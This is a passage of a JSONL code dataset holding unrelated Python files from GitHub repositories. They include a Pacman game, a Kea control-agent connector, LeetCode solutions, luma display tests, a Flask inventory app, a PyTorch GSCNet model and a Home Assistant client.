self.score_text.textrect.x -= self.score_text.textrect.w /2\n\n #Dubugging and Logs\n #self.sprite_sheet.print_dic_log()\n\n #Others\n self.allow_movement = False\n self.main_menu = True\n self.pacman_game = False\n\n\n def __check_events(self, allow_movement):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n self.pacman.movement_keydown(event, allow_movement)\n if event.key == pygame.K_SPACE:\n self.main_menu = False\n self.pacman_game = True\n\n #elif event.type == pygame.KEYUP:\n # self.pacman.movement_keyup(event)\n\n def __fill_display(self, color):\n self.screen.fill(self.colors[color])\n\n def __game_display(self):\n self.update_movement()\n self.ghost_blinky.check_collision(self.maze, self.pacman)\n self.ghost_blinky.movement()\n self.score_text.recalculate_text(self.maze.points)\n self.maze.render_maze()\n self.pacman.render_character()\n self.ghost_blinky.render_character()\n self.render_lives()\n # Here\n self.allow_movement = self.pacman.check_collision(self.maze, self.allow_movement)\n\n def __refresh_display(self):\n\n pygame.display.update()\n self.clock.tick(settings.FPS)\n\n def update_movement(self):\n self.pacman.update_movement()\n\n def set_pacman_position(self):\n self.pacman.rect.x = self.maze.pacman_start_x\n self.pacman.rect.y = self.maze.pacman_start_y\n\n def run_game(self):\n\n # Objects\n menu = Main_Menu(self.screen, self.colors)\n\n while self.is_running:\n self.__check_events(self.allow_movement)\n\n self.__fill_display(\"Black\")\n if self.main_menu:\n menu.display_menu()\n self.pacman_menu.render_character()\n self.pacman_menu.update_main_menu_movement()\n elif self.pacman_game:\n self.__game_display()\n\n self.__refresh_display()\n\n def load_pacman_lives(self):\n x = self.lives_text.textrect.x + self.lives_text.textrect.w\n #y = self.SCREEN_HEIGHT-self.maze.reserved_height + self.lives_text.textrect.h/4\n y = self.lives_text.textrect.centery\n for life in range(self.pacman_lives_count):\n self.pacman_lives_stored.append(Pacman(self.screen, self.sprite_sheet, self.maze.scale_size_x,\n self.maze.scale_size_y, x, y))\n x += self.pacman.rect.w+self.pacman.rect.w/2\n\n for life in self.pacman_lives_stored:\n life.rect.y -= life.rect.h/2\n\n def render_lives(self):\n self.score_text.display_text()\n self.lives_text.display_text()\n\n for lives in self.pacman_lives_stored:\n lives.render_character()","repo_name":"BryanCastro/CPSC-386","sub_path":"Pacman/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":5356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"10618256399","text":"import httplib\n\nfrom kea_conn import CAResponse # CARequest\n\ndef send_to_control_agent(params):\n \"\"\" Sends a request to Control Agent, receives a response and returns it.\"\"\"\n\n # Establish HTTP connection first.\n conn = httplib.HTTPConnection(params.http_host, params.http_port)\n conn.connect()\n\n # Use POST to send it\n _ = conn.putrequest('POST', params.path)\n\n # Send the headers first\n for k in params.headers:\n conn.putheader(k, params.headers[k])\n conn.endheaders()\n\n # Send the body (i.e. the actual content)\n conn.send(params.content)\n\n # Now get the response\n resp = conn.getresponse()\n\n # Now get the response details, put it in CAResponse and\n # return it\n result = CAResponse(resp.status, resp.reason, resp.read())\n conn.close()\n\n return result\n","repo_name":"telekom/dt-kea-netconf","sub_path":"src/bin/shell/kea_connector2.py","file_name":"kea_connector2.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"30530978712","text":"class ticket():\r\n us_price=100\r\n weekend_price=100*(1+100*1.2)\r\n kids_price=us_price/2\r\n kids_weekend=(100*(1+100*1.2))/2\r\n number_child=2\r\n number_adult=3\r\n def week_price(self,num_child,num_adult):\r\n self.num_child=num_child\r\n self.num_adult=num_adult\r\n print(\"child price is %d,adult price is %d\"%(self.num_child*self.kids_price,self.num_adult*self.us_price))\r\n","repo_name":"1565937966/Bowen","sub_path":"python file/Check.py","file_name":"Check.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"18282964932","text":"class ProductOfNumbers:\n\n def __init__(self):\n self.p = [1]\n\n def add(self, num: int) -> None:\n if num == 0:\n self.p = [1]\n else:\n self.p.append(self.p[-1]*num)\n\n def getProduct(self, k: int) -> int:\n if k >= len(self.p):\n return 0\n else:\n return self.p[-1] / self.p[-k-1]\n\n# Your ProductOfNumbers object will be instantiated and called as such:\n# obj = ProductOfNumbers()\n# obj.add(num)\n# param_2 = obj.getProduct(k)\n\nif __name__ == '__main__':\n obj = ProductOfNumbers()\n obj.add(3)\n obj.add(0)\n obj.add(2)\n obj.add(5)\n obj.add(4)\n print(obj.getProduct(2))\n print(obj.getProduct(3))\n print(obj.getProduct(4))\n obj.add(8)\n print(obj.getProduct(2))\n \n","repo_name":"fghpdf/leetcode","sub_path":"py/product_of_the_last_k_numbers/product_of_the_last_k_numbers.py","file_name":"product_of_the_last_k_numbers.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"74674678802","text":"class Solution:\n def replaceWords(self, dictionary: List[str], sentence: str) -> str:\n roots = set(dictionary)\n result = []\n for word in sentence.split():\n found = False\n current = \"\"\n for c in word:\n current += c\n if current in roots:\n result.append(current)\n found = True\n break\n\n if not found:\n result.append(word)\n\n return \" \".join(result)\n","repo_name":"stbrumme/leetcode","sub_path":"0648.py","file_name":"0648.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"37878921004","text":"from luma.core.device import dummy\nfrom luma.core.legacy import text, textsize, show_message\nfrom luma.core.legacy.font import proportional, CP437_FONT, LCD_FONT\n\nfrom unittest.mock import Mock, call\n\n\ndef test_textsize():\n \"\"\"\n The bounding box of the text, as drawn in the specified font, is correctly\n calculated.\n \"\"\"\n assert textsize(\"Hello world\") == (88, 8)\n assert textsize(\"Hello world\", font=proportional(CP437_FONT)) == (71, 8)\n\n\ndef test_text_space():\n \"\"\"\n Draw a space character.\n \"\"\"\n draw = Mock(unsafe=True)\n text(draw, (2, 2), \" \", fill=\"white\")\n draw.point.assert_not_called()\n\n\ndef test_text_char():\n \"\"\"\n Draw a text character.\n \"\"\"\n draw = Mock(unsafe=True)\n text(draw, (2, 2), \"L\", font=LCD_FONT, fill=\"white\")\n draw.point.assert_has_calls([\n call((2, 2), fill='white'),\n call((2, 3), fill='white'),\n call((2, 4), fill='white'),\n call((2, 5), fill='white'),\n call((2, 6), fill='white'),\n call((2, 7), fill='white'),\n call((2, 8), fill='white'),\n call((3, 8), fill='white'),\n call((4, 8), fill='white'),\n call((5, 8), fill='white'),\n call((6, 8), fill='white')\n ])\n\n\ndef test_show_message():\n \"\"\"\n Scroll a message right-to-left across the devices display.\n \"\"\"\n device = dummy()\n show_message(device, 'text', scroll_delay=0.0)\n","repo_name":"rm-hull/luma.core","sub_path":"tests/test_legacy.py","file_name":"test_legacy.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"3"}
+{"seq_id":"18071926368","text":"from flask import Blueprint, render_template, url_for, redirect, flash, request, jsonify\n\nfrom inventory.models.inventory import Inventory\nfrom inventory.models.product import Product\nfrom inventory.models.location import Location\nfrom inventory.models.transfer import Transfer\n\n\nfrom inventory.extensions import db\n\nblueprint = Blueprint('inventory', __name__)\n\n\n@blueprint.route('/inventory')\ndef index():\n data_inventory = Inventory.query.all()\n has_inventory = bool(data_inventory)\n # TODO: Pass has_inventory to render to display warning message\n\n return render_template('inventory/index.html',\n data_inventory=data_inventory,\n has_inventory=has_inventory)\n\n\n@blueprint.route('/product', methods=['GET', 'POST'])\ndef product():\n if (request.method == \"POST\") and ('product_name'\n in request.form) and ('product_qty'\n in request.form):\n product_name = request.form[\"product_name\"]\n product_qty = request.form[\"product_qty\"]\n \n print({product_name, product_qty})\n new_product = Product(product_name=product_name,\n product_qty=product_qty)\n\n try:\n db.session.add(new_product)\n db.session.commit()\n return redirect(url_for(\"product\"))\n\n except:\n products = Product.query.order_by(Product.product_id).all()\n return render_template(\"inventory/product.html\", products=products)\n else:\n products = Product.query.order_by(Product.product_id).all()\n print(products)\n return render_template(\"inventory/product.html\", products=products)\n\n@blueprint.route(\"/update-product/\", methods=[\"POST\"])\ndef updateProduct(product_id):\n product = Product.query.get_or_404(product_id)\n old_product = product\n \n product.product_name = request.form['product_name']\n product.product_qty = request.form['product_qty']\n\n \n try:\n \n update_transfer= Transfer.query\\\n .join(Product, Transfer.product_name == old_product.product_name)\\\n .add_columns(\n Transfer.transfer_id,\n Transfer.product_qty,\n Product.product_name, \n Transfer.transfer_from,\n Transfer.transfer_to,\n Transfer.transfer_time)\\\n .all()\n print(update_transfer)\n for trans in update_transfer:\n trans.product_name = product.product_name\n trans.product_qty = product.product_qty\n db.session.commit()\n return redirect(\"/product\")\n\n except:\n print(\"There was an issue while updating the Product\")\n render_template(\"inventory/product.html\", error=\"There was an issue while updating the Product\")\n\n\n@blueprint.route(\"/location\", methods=['GET', 'POST'])\ndef location():\n if (request.method == \"POST\") and ('location_name' in request.form):\n location_name = request.form[\"location_name\"]\n new_location = Location(location_name=location_name)\n\n try:\n db.session.add(new_location)\n db.session.commit()\n return redirect(\"/location\")\n\n except:\n locations = Location.query.order_by(Location.location_id).all()\n return render_template(\"inventory/location.html\", locations=locations)\n else:\n locations = Location.query.order_by(Location.location_id).all()\n return render_template(\"inventory/location.html\", locations=locations)\n \n\n@blueprint.route(\"/update-location/\", methods=[\"POST\"])\ndef updateLocation(location_id):\n location = Location.query.get_or_404(location_id)\n old_location = location\n \n location.location_name = request.form['location_name']\n\n \n try:\n db.session.commit() \n # trans1 = Transfer.query.filter(Transfer.transfer_from == old_location.transfer_from).all()\n # trans2 = Transfer.query.filter(Transfer.transfer_to == old_location.transfer_to).all() \n\n # for tra in trans1:\n # tra.transfer_to = location.transfer_to\n # for tra in trans2:\n # tra.transfer_to = location.transfer_to\n # db.session.commit()\n return redirect(\"/location\")\n\n except:\n print(\"There was an issue while updating the Product\")\n render_template(\"inventory/location.html\", error=\"There was an issue while updating the Product\")\n\n\n@blueprint.route(\"/transfers\", methods=['GET', 'POST'])\ndef transfers():\n if request.method == \"POST\" :\n product_name = request.form[\"product_name\"]\n qty = request.form[\"product_qty\"]\n transfer_from = request.form[\"transfer_from\"]\n transfer_to = request.form[\"transfer_to\"]\n \n if transfer_from != transfer_to and transfer_to != transfer_from:\n new_transfer = Transfer(product_name=product_name, product_qty=qty, transfer_from=transfer_from, transfer_to=transfer_to)\n new_inventory = Inventory(location=transfer_to, product_name=product_name, product_qty=qty)\n \n try:\n db.session.add(new_transfer)\n db.session.add(new_inventory)\n db.session.commit()\n return redirect(\"/transfers\")\n except:\n return render_template('inventory/transfer.html', error=\"There Was an issue while adding a new Transfer\")\n else:\n products = Product.query.order_by(Product.product_id).all()\n locations = Location.query.order_by(Location.location_id).all()\n transfers = Transfer.query\\\n .join(Product, Transfer.product_name == Product.product_name)\\\n .add_columns(\n Transfer.transfer_id,\n Transfer.product_qty,\n Product.product_name, \n Transfer.transfer_from,\n Transfer.transfer_to,\n Transfer.transfer_time)\\\n .all()\n return render_template(\"inventory/transfer.html\", transfers=transfers, products=products, locations=locations, error=\"There Was an issue while adding a new Transfer\")\n else:\n products = Product.query.order_by(Product.product_id).all()\n locations = Location.query.order_by(Location.location_id).all()\n transfers = Transfer.query\\\n .join(Product, Transfer.product_name == Product.product_name)\\\n .add_columns(\n Transfer.transfer_id,\n Transfer.product_qty,\n Product.product_name, \n Transfer.transfer_from,\n Transfer.transfer_to,\n Transfer.transfer_time)\\\n .all()\n \n return render_template(\"inventory/transfer.html\", transfers=transfers, products=products, locations=locations)\n\n\n\n@blueprint.route(\"/delete-product/\")\ndef deleteProduct(product_id):\n product_to_delete = Product.query.get_or_404(product_id)\n\n try:\n db.session.delete(product_to_delete)\n db.session.commit()\n return redirect(\"/product\")\n except:\n return \"There was an issue while deleteing the Product\"\n \n@blueprint.route(\"/delete-location/\")\ndef deleteLocation(location_id):\n location_to_delete = Location.query.get_or_404(location_id)\n\n try:\n db.session.delete(location_to_delete)\n db.session.commit()\n return redirect(\"/location\")\n except:\n return \"There was an issue while deleteing the Product\"","repo_name":"esogelola/Fall-2022---Shopify-Developer-Intern","sub_path":"inventory/controllers/inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":7367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"15176184492","text":"#when rolling a dice (numbers 1-20) 20 is max dice value for magic the gathering\nimport random\n\ndef rollDice(min, max):\n while True:\n print(\"Roling dice...\")\n number = random.randint(min,max)\n print(f\"Your number: {number}\")\n break\n\nrollDice(1,20)","repo_name":"moris96/magic-the-gathering-life-counter","sub_path":"magic the gathering life counter/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"2033433444","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchsummary import summary\nimport math\n\n\n\ndef DepthWiseConv(in_channels, stride=1):\n \"\"\"\n Depthwise Separable Convolution\n in_channels == out_channels == groups\n\n its task is responsible for feature abstraction\n can also perform subsampling\n \"\"\"\n return (\n nn.Sequential(\n nn.Conv2d(in_channels=in_channels, out_channels=in_channels, kernel_size=3, stride=stride, padding=1, groups=in_channels, bias=False),\n nn.BatchNorm2d(in_channels),\n nn.ReLU6(inplace=True),\n )\n )\n\n\n\ndef PointWiseGroupConv(channel_in, channel_out, group_number=1, stride=1):\n \"\"\"\n Pointwise 1x1 Group Convolution\n\n group number is 3 for general-wise convolution (depthwise, heightwise, and widthwise convolutions)\n\n its task is to project the input feature map into expansion layer for feature abstraction\n it is also responsible for subsampling.\n\n \"\"\"\n return (\n nn.Sequential(\n nn.Conv2d(in_channels=channel_in, out_channels=channel_out, kernel_size=1, stride=stride, padding=0, groups=group_number, bias=False),\n nn.BatchNorm2d(channel_out),\n nn.ReLU6(inplace=True)\n )\n )\n\n\n\ndef PointWiseConv(channel_in, channel_out):\n \"\"\"\n The regular 1x1 convolution without subsmpling\n \"\"\"\n return (\n nn.Sequential(\n nn.Conv2d(in_channels=channel_in, out_channels=channel_out, kernel_size=1, stride=1, padding=0, groups=1, bias=False),\n nn.BatchNorm2d(channel_out),\n nn.ReLU6(inplace=True)\n )\n )\n\n\n\ndef LinearConv(channel_in, channel_out):\n \"\"\"\n The 1x1 linear convolution with ReLU\n \"\"\"\n return (\n nn.Sequential(\n nn.Conv2d(in_channels=channel_in, out_channels=channel_out, kernel_size=1, stride=1, padding=0, groups=1, bias=False),\n nn.BatchNorm2d(channel_out)\n )\n )\n\n\n\nclass ChannelShuffleBlock(nn.Module):\n \"\"\"\n Channel shuffle operation from ShuffleNet\n \"\"\"\n def __init__(self, groups=3):\n super(ChannelShuffleBlock, self).__init__()\n self.groups = groups\n\n def forward(self, x):\n '''Channel shuffle: [N,C,H,W] -> [N,g,C/g,H,W] -> [N,C/g,g,H,w] -> [N,C,H,W]'''\n N, C, H, W = x.size()\n g = self.groups\n return x.view(N, g, C // g, H, W).permute(0, 2, 1, 3, 4).reshape(N, C, H, W)\n\n\n\nclass EqualSplitBlock(nn.Module):\n \"\"\"\n It is responsible for distributing the same subsets of feature maps to the 3 parallel convolutions\n \"\"\"\n def __init__(self, n):\n super(EqualSplitBlock, self).__init__()\n self.n = n\n\n def forward(self, x):\n c3 = int(x.size(1))\n c1 = int(x.size(1) // self.n)\n c2 = c3 - c1\n return x[:, :c1, :, :], x[:, c1:c2, :, :], x[:, c2:c3, :, :]\n\n\n\nclass SpatialwiseConv(nn.Module):\n \"\"\"\n Spatial-wise Convolution: heightwise convolution and widthwise convolution\n now the grouping is performed on width dimension and height dimension\n \"\"\"\n def __init__(self, channel_proxy, stride=1):\n super(SpatialwiseConv, self).__init__()\n self.conv = nn.Conv2d(in_channels=channel_proxy, out_channels=channel_proxy, kernel_size=3,\n stride=stride, padding=1, groups=channel_proxy, bias=False)\n self.bn = nn.BatchNorm2d(channel_proxy)\n self.relu = nn.ReLU6(inplace=True)\n\n def forward(self, x):\n x = self.conv(x)\n x = self.bn(x)\n x = self.relu(x)\n return x\n\n\n\nclass DimensionTranspose(nn.Module):\n \"\"\"\n tensor dimension transpose\n \"\"\"\n def __init__(self, spatial_type=\"heightwise\"):\n super(DimensionTranspose, self).__init__()\n self.spatial_type = spatial_type\n\n def forward(self, x):\n #N, C, H, W = x.size()\n if self.spatial_type == \"heightwise\":\n # 交换 C, H两个维度\n x = x.transpose(1,2)\n elif self.spatial_type == \"widthwise\":\n # 交换 C, W两个维度\n x = x.transpose(1,3)\n return x\n\n\n\n\nclass DepthwiseSeparableConv(nn.Module):\n def __init__(self, in_channel, out_channel, stride=1):\n super(DepthwiseSeparableConv, self).__init__()\n self.depthwiseConv = DepthWiseConv(in_channels=in_channel, stride=stride)\n self.linearConv = LinearConv(channel_in=in_channel, channel_out=out_channel)\n\n def forward(self, x):\n x = self.depthwiseConv(x)\n x = self.linearConv(x)\n return x\n\n\n\n\nclass SpatialWiseSeparableConv(nn.Module):\n def __init__(self, in_channel, hidden_dim, out_channel, input_height, input_width, stride=1):\n super(SpatialWiseSeparableConv, self).__init__()\n\n # if stride ==2, the width and height of feature maps are reduced by 1/2\n if stride == 2:\n input_height = input_height // 2\n input_width = input_width // 2\n else:\n input_height = input_height\n input_width = input_width\n\n assert hidden_dim % 3 == 0\n subset_in_dim = hidden_dim // 3\n\n self.pointwiseGroupConv = PointWiseGroupConv(channel_in=in_channel, channel_out=hidden_dim, group_number=3, stride=stride)\n\n # channel shuffling\n self.channelShuffle = ChannelShuffleBlock(groups=3)\n\n # channel splitting\n self.split = EqualSplitBlock(n=3)\n\n # depthwise convolution in the first branch of parallels\n self.depthwiseConv = DepthWiseConv(in_channels=subset_in_dim, stride=1)\n\n # dimension transpose for heightwise convolution [-1, 48, 112, 112] -> [-1, 112, 48, 112]\n self.heightwiseTranspose = DimensionTranspose(spatial_type=\"heightwise\")\n\n # heightwise convolution in the second branch of parallels [-1, 112, 48, 112]->[-1, 112, 48, 112]\n self.heightwiseConv = SpatialwiseConv(channel_proxy=input_height, stride=1)\n\n # dimension transpose for heightwise convolution [-1, 48, 112, 112] -> [-1, 112, 112, 48]\n #self.widthwiseTranspose = DimensionTranspose(spatial_type=\"widthwise\")\n\n # widthwise convolution in the third branch of parallels [-1, 112, 112, 48] -> [-1, 112, 112, 48]\n #self.widthwiseConv = SpatialwiseConv(channel_proxy=input_width, stride=1)\n\n # the final linear projection convolution\n self.linearConv = LinearConv(channel_in=hidden_dim, channel_out=out_channel)\n\n def forward(self, x):\n expansion_layer = self.pointwiseGroupConv(x)\n expansion_shuffle = self.channelShuffle(expansion_layer)\n split1, split2, split3 = self.split(expansion_shuffle)\n split1 = self.heightwiseTranspose(split1)\n split1 = self.heightwiseConv(split1)\n split1 = self.heightwiseTranspose(split1)\n split2 = self.heightwiseTranspose(split2)\n split2 = self.heightwiseConv(split2)\n split2 = self.heightwiseTranspose(split2)\n split3 = self.heightwiseTranspose(split3)\n split3 = self.heightwiseConv(split3)\n split3 = self.heightwiseTranspose(split3)\n # residual connection to improve gradient flow and feature reuse\n concat_tensor = torch.cat([split1, split2, split3], 1) + expansion_shuffle\n # linear projection to output feature map\n out = self.linearConv(concat_tensor)\n return out\n\n\n\n\nclass GSCBlock(nn.Module):\n\n def __init__(self, input_height, input_width, channel_in, channel_out, expand_ratio, stride):\n super(GSCBlock, self).__init__()\n\n self.stride = stride\n assert stride in [1, 2]\n\n # use the residual shortcut when stride == 1 and channel_in equals channel_out\n self.use_res_connect = self.stride == 1 and channel_in == channel_out\n\n # the dimension of expansion layer: 24 * 6 = 144\n hidden_dim = channel_in * expand_ratio\n\n if expand_ratio == 1:\n self.conv = nn.Sequential(DepthwiseSeparableConv(in_channel=hidden_dim, out_channel=channel_out, stride=stride))\n else:\n self.conv = nn.Sequential(SpatialWiseSeparableConv(in_channel=channel_in, hidden_dim=hidden_dim, out_channel=channel_out,\n input_height=input_height, input_width=input_width, stride=stride))\n\n def forward(self, x):\n if self.use_res_connect:\n return x + self.conv(x)\n else:\n return self.conv(x)\n\n\n\nclass GSCNetHeightOnly(nn.Module):\n def __init__(self, input_height=224, input_width=224, in_channels=3, n_classes=1000):\n super(GSCNetHeightOnly, self).__init__()\n\n self.in_planes = 36\n\n # 因为第一次下采样,特征图谱的长和宽变为input的1/2\n self.input_height = input_height // 2\n self.input_width = input_width // 2\n\n # 第一次卷积,并下采样 224x224x3 -> 112x112x36\n self.stem_conv = nn.Conv2d(in_channels=in_channels, out_channels=36, kernel_size=3, stride=2, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(36)\n\n layers = []\n\n self.gsc_block_configs = [\n # t, c, n, s\n [1, 18, 1, 1], # 112 * 112 * 36 -> 112 * 112 * 18\n [6, 24, 2, 2], # 112 * 112 * 18 -> 56 * 56 * 24\n [6, 36, 3, 2], # 56 * 56 * 24 -> 28 * 28 * 36\n [6, 60, 4, 2], # 28 * 28 * 36 -> 14 * 14 * 60\n [6, 96, 3, 1], # 14 * 14 * 60 -> 14 * 14 * 96\n [6, 162, 3, 2], # 14 * 14 * 96 -> 7 * 7 * 162\n [6, 321, 1, 1] # 7 * 7 * 162 -> 7 * 7 * 321\n ]\n\n # t= expansion factor, c = output channel number, n = bottleneck number, s = stride\n for t, c, n, s in self.gsc_block_configs:\n for i in range(n):\n # bottleneck number > 1, 总是第一个下采样\n stride = s if i == 0 else 1\n layers.append(GSCBlock(input_height=self.input_height, input_width=self.input_width,\n channel_in=self.in_planes, channel_out=c, expand_ratio=t, stride=stride))\n self.in_planes = c\n\n if stride == 2:\n self.input_height = self.input_height // 2\n self.input_width = self.input_width // 2\n else:\n self.input_height = self.input_height\n self.input_width = self.input_width\n\n self.layers = nn.Sequential(*layers)\n\n # 最后一次卷积\n self.last_conv = PointWiseConv(self.in_planes, 1280)\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n\n # 分类器\n self.classifier = nn.Linear(1280, n_classes)\n\n # 初始化权重\n self._initialize_weights()\n\n\n def forward(self, x):\n x = F.relu(self.bn1(self.stem_conv(x)))\n x = self.layers(x)\n x = self.last_conv(x)\n x = self.avg_pool(x).view(-1, 1280)\n x = self.classifier(x)\n return x\n\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n\n\n\nif __name__==\"__main__\":\n model = GSCNetHeightOnly(n_classes=1000)\n summary(model, (3, 224, 224), device='cpu')\n from thop import profile\n\n input_size = (1, 3, 224, 224)\n flops, params = profile(model=model, input_size=input_size)\n print('Total params: %.2fM' % (params / 1000000.0))\n print('Total flops: %.2fM' % (flops / 1000000.0))\n","repo_name":"shicheng123moon/GSCNet","sub_path":"models/GSCNetHeightOnly.py","file_name":"GSCNetHeightOnly.py","file_ext":"py","file_size_in_byte":11876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"39885370485","text":"a, b = map(int,input().split())\n\ndef f(n):\n new_num = str(n)[::-1]#[::-1] -> 처음부터 끝까지 -1칸씩 = 역순으로 재배치\n return(int(new_num))\n\nif f(a) > f(b):\n print(f(a))\nelse:\n print(f(b))\n","repo_name":"Alice-1012/BOJ","sub_path":"Class 1/2908.py","file_name":"2908.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"6181324667","text":"\"\"\"\nHome Assistant Client\nHandle connection between skill and HA instance trough websocket.\n\"\"\"\nimport ipaddress\nimport json\nimport re\n\nfrom fuzzywuzzy import fuzz\nfrom requests import get, post\nfrom requests.exceptions import RequestException, Timeout\nfrom requests.models import Response\n\n__author__ = \"btotharye\"\n\n# Timeout time for HA requests\nTIMEOUT = 10\n\n\"\"\"Regex for IP address check\"\"\"\nIP_REGEX = r\"\".join(\n r\"\\b(?:https?://)?((?:(?:www\\.)?(?:[\\da-z\\.-]+)\\.(?:[a-z]{2,6})|\"\n r\"(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[\"\n r\"0-4][0-9]|[01]?[0-9][0-9]?)|(?:(?:[0-9a-fA-F]{1,4}:){7,7}[0-9a\"\n r\"-fA-F]{1,4}|(?:[0-9a-fA-F]{1,4}:){1,7}:|(?:[0-9a-fA-F]{1,4}:){\"\n r\"1,6}:[0-9a-fA-F]{1,4}|(?:[0-9a-fA-F]{1,4}:){1,5}(?::[0-9a-fA-F\"\n r\"]{1,4}){1,2}|(?:[0-9a-fA-F]{1,4}:){1,4}(?::[0-9a-fA-F]{1,4}){1\"\n r\",3}|(?:[0-9a-fA-F]{1,4}:){1,3}(?::[0-9a-fA-F]{1,4}){1,4}|(?:[0\"\n r\"-9a-fA-F]{1,4}:){1,2}(?::[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,\"\n r\"4}:(?:(?::[0-9a-fA-F]{1,4}){1,6})|:(?:(?::[0-9a-fA-F]{1,4}){1,\"\n r\"7}|:)|fe80:(?::[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(?:fff\"\n r\"f(?::0{1,4}){0,1}:){0,1}(?:(?:25[0-5]|(?:2[0-4]|1{0,1}[0-9]){0\"\n r\",1}[0-9])\\.){3,3}(?:25[0-5]|(?:2[0-4]|1{0,1}[0-9]){0,1}[0-9])|\"\n r\"(?:[0-9a-fA-F]{1,4}:){1,4}:(?:(?:25[0-5]|(?:2[0-4]|1{0,1}[0-9]\"\n r\"){0,1}[0-9])\\.){3,3}(?:25[0-5]|(?:2[0-4]|1{0,1}[0-9]){0,1}[0-9\"\n r\"]))))(?::[0-9]{1,4}|[1-5][0-9]{4}|6[0-4][0-9]{3}|65[0-4][0-9]{\"\n r\"2}|655[0-2][0-9]|6553[0-5])?(?:/[\\w\\.-]*)*/?\\b\"\n)\n\nIPV6_REGEX = r\"\".join(\n r\"((?:[0-9a-fA-F]{1,4}:){1,4}:(?:(?:25[0-5]|(?:2[0-4]|1{0,1}[0\"\n r\"-9]){0,1}[0-9])\\.){3,3}(?:25[0-5]|(?:2[0-4]|1{0,1}[0-9]){0,1\"\n r\"}[0-9])|(?:fe80:(?::[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,})|\"\n r\"::(?:ffff(?::0{1,4}){0,1}:){0,1}(?:(?:25[0-5]|(2[0-4]|1{0,1}\"\n r\"[0-9]){0,1}[0-9])\\.){3,3}(?:25[0-5]|(?:2[0-4]|1{0,1}[0-9]){0\"\n r\",1}[0-9])|(?:(?:[0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4})|(?:\"\n r\"[0-9a-fA-F]{1,4}:){1,7}(?:(?::[0-9a-fA-F]{1,4}){1,7}|:)|(?::\"\n r\":(?:[0-9a-fA-F]{1,4}:){,6}(?:[0-9a-fA-F]{1,4})))\"\n)\n\n\ndef check_url(ip_address: str) -> str:\n \"\"\"Function to check if valid url/ip was supplied\n\n First regex check for IPv6.\n If nothing found, second regex try to find IPv4 and domains names.\n\n Args:\n ip_address: String with ip address set by user.\n\n Returns:\n Ip address found by regex.\n \"\"\"\n if not ip_address:\n return\n\n valid = False\n matches = re.findall(IPV6_REGEX, ip_address)\n if matches:\n largest = max(matches, key=len)[0]\n\n if \":\" in largest:\n try:\n checked_ip = ipaddress.ip_address(largest)\n if checked_ip:\n valid = True\n except ValueError:\n return None\n\n if largest and valid:\n return largest\n\n matches = re.search(IP_REGEX, ip_address)\n if matches:\n return matches.group(1)\n return None\n\n\n# pylint: disable=R0912, W0105, W0511\nclass HomeAssistantClient:\n \"\"\"Home Assistant client class\"\"\"\n\n def __init__(self, config):\n self.ssl = config[\"ssl\"] or False\n self.verify = config[\"verify\"] or True\n ip_address = config[\"ip_address\"]\n token = config[\"token\"]\n port_number = config[\"port_number\"]\n if self.ssl:\n self.url = f\"https://{ip_address}\"\n else:\n self.url = f\"http://{ip_address}\"\n if port_number:\n self.url = f\"{self.url}:{port_number}\"\n self.headers = {\n \"Authorization\": f\"Bearer {token}\",\n \"Content-Type\": \"application/json\",\n }\n\n def _get_state(self) -> json:\n \"\"\"Get state object\n\n Throws request Exceptions\n (Subclasses of ConnectionError or RequestException,\n raises HTTPErrors if non-Ok status code)\n\n Returns:\n Json containing response from HA.\n \"\"\"\n if self.ssl:\n req = get(\n f\"{self.url}/api/states\",\n headers=self.headers,\n verify=self.verify,\n timeout=TIMEOUT,\n )\n else:\n req = get(f\"{self.url}/api/states\", headers=self.headers, timeout=TIMEOUT)\n req.raise_for_status()\n return req.json()\n\n def connected(self) -> bool:\n \"\"\"Simple connection test to HA instance\n\n Returns:\n Return false if any of errors occur\n \"\"\"\n try:\n self._get_state()\n return True\n except (Timeout, ConnectionError, RequestException):\n return False\n\n def find_entity(self, entity: str, types: list) -> dict:\n \"\"\"Find entity with specified name, fuzzy matching\n\n Throws request Exceptions\n (Subclasses of ConnectionError or RequestException,\n raises HTTPErrors if 